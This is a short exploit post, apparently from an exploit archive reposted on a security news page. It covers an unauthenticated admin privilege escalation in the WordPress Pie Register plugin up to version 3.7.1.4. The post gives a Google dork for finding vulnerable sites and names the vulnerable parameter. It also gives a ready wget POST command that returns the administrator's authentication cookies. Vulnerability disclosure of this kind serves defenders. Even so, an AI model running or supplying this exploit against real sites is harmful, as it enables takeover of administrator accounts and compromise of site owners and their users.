WordPress Pie Register plugin versions 3.7.1.4 and below suffer from a privilege escalation vulnerability.
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntuVulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin).
Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
Related posts:
Anatomy Of an Endpoint Attack: How A Cyberattack Can Compromise an Enterprise Network
Phishing Campaign Exploits Open Redirection Vulnerability In ‘Indeed.com’
New JinxLoader Targeting Users with Formbook and XLoader Malware
Staples confirms cyberattack behind service outages, delivery issues
Banking Malware Threats Surging as Mobile Banking Increases – Nokia Threat Intelligence Report